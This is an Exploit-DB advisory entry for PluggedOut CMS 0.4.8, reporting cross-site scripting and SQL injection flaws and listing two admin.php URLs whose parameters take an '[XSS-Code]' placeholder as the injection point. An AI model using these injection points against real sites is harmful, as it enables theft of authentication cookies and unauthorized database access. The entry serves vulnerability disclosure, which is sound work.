PluggedOut CMS 0.4.8 admin.php XSS

2005-09-30T00:00:00
ID EDB-ID:26054
Type exploitdb
Reporter FalconDeOro
Modified 2005-09-30T00:00:00

Description

PluggedOut CMS 0.4.8 admin.php XSS. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/14426/info
 
PluggedOut CMS is prone to multiple cross-site scripting and SQL injection vulnerabilities.
 
Exploitation could allow for theft of cookie-based authentication credentials or unauthorized access to database data. Other attacks are also possible.

http://www.example.com/admin.php?action=content_edit&contentid=[XSS-Code] 

http://www.example.com/admin.php?action=report_statistics&report=visitors&&s=[XSS-Code]